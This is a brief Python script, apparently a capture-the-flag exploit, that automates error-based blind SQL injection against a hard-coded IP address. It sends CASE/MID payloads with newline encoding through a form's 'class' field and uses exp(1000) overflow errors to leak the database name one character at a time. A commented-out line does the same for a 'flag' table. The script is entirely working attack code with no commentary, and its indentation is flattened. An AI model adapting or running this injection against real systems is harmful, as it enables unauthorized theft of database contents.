from urllib.parse import urlencode
from urllib.parse import unquote
import requests
burp0_url = "http://123.60.32.152:80/"
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
all_str = "0123456789abcdefghijklmnopqrstuvwxyz!\"#$%&\\'()*+,-./:;<=>?@[\\]^_`{|}~"
flag = ''
for leng in range(1,50):
for char in all_str:
payload = "case%0awhen%0amid(database()from({})for(1))%0ain%0a(0x{})%0athen%0aexp(1000)%0aelse%0a1%0aend".format(leng, hex(ord(char))[2:])
#payload = "case%0awhen%0amid((select%0aflag%0afrom%0aflag)from({})for(1))%0ain%0a(0x{})%0athen%0aexp(1000)%0aelse%0a1%0aend".format(leng, hex(ord(char))[2:])
burp0_data = {"class": unquote(payload), "limit": "4"}
resp = requests.post(burp0_url, headers=burp0_headers, data=urlencode(burp0_data))
if 'error' in resp.text:
flag += char
print(flag)
else:
continue
# print(resp.text)
# print(resp.request.body)